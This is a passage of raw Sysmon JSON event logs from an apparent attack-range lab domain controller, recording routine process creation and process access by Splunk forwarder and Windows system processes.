C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:53.344","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01CD-5F25-0000-001074140400}","TargetProcessId":"3816","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2270,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:54.021\r\nProcessGuid: {A837DB8D-01CE-5F25-0000-001026160400}\r\nProcessId: 3848\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:54.021","ProcessGuid":"{A837DB8D-01CE-5F25-0000-001026160400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2271,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:54.203\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01CE-5F25-0000-001026160400}\r\nTargetProcessId: 3848\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:54.203","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01CE-5F25-0000-001026160400}","TargetProcessId":"3848","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2272,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:54.203\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01CE-5F25-0000-001026160400}\r\nTargetProcessId: 3848\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:54.203","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01CE-5F25-0000-001026160400}","TargetProcessId":"3848","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2273,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:54.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:54.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2274,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:54.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:54.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2275,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:54.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:54.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2276,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:54.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:54.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2277,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:54.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:54.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
